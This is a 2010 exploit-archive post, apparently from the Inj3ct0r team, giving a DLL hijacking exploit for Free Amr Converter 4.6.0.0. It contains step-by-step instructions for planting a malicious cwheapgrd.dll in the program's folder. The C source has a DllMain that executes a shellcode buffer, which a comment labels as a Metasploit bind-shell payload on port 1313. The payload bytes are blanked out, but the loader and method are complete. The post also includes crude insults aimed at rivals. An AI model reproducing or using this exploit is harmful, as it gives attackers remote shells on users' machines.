[local exploits] - Free Amr Converter 4.6.0.0 DLL Hijacking
Posted on 23 October 2010
================================================
Free Amr Converter 4.6.0.0 DLL Hijacking Exploit
================================================

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

#########################################
I'm anT!-Tr0J4n member from Inj3ct0r Team
#########################################

/*
#Free Amr Converter 4.6.0.0 DLL Hijacking Exploit (cwheapgrd.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Product Version : 4.6.0.0
#Vendor : http://www.ahdsoft.com/
#Tested on: Windows XP sp3
-------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck you kids
-------------------------------
[>>] Compile code as cwheapgrd.dll
[>>] Move DLL file to the directory where Free Amr Converter is installed
[>>] check the result --> 0wn33d
[+] exploit.acc
[+] exploit.aif
[+] exploit.aiff
[+] exploit.ape
[+] exploit.flac
[+] exploit.m4a
[+] exploit.m4b
[+] exploit.mp3
[+] exploit.mpc
[+] exploit.ogg
[+] exploit.wav
[+] exploit.mp4
[+] exploit.vob
[+] exploit.mod
[+] exploit.mpg
[+] exploit.mpeg
==========================
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] = "";  /* payload bytes omitted */

BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    /* fdwReason is not checked, so this runs on every DllMain notification:
       buf is cast to a function pointer and called. */
    int (*func)();
    func = (int (*)()) buf;
    (int)(*func)();
    return 0;
}

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-10-23]